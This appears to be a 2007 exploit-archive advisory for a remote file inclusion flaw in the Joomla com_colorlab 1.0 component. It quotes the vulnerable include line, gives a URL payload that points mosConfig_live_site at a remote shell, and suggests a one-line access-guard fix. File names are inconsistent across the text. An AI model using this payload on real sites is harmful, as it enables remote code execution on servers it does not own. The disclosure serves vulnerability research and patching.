[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component com_colorlab 1.0 Remote File Inclusion Vulnerability
# Published : 2007-10-12
# Author : xoron
# Previous Title : WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities
# Next Title : TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit
--------------------
Joomla com_colorlab Remote File Include
--------------------
Found : xoron
--------------------
Download:
http://download.joomlaportal.ch/content/view/474/
--------------------
Wrong Code:
include( "$mosConfig_live_site/components/com_color/about.html" );
--------------------
Exploit:
/administrator/components/com_color/admin.color.php?mosConfig_live_site=shell?
--------------------
How to Fix:
1-open admin.colo.php
2-write this codes before wrong codes
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
3-save and exit
--------------------
Thanx: mdx :)
--------------------
# www.Syue.com [2007-10-12]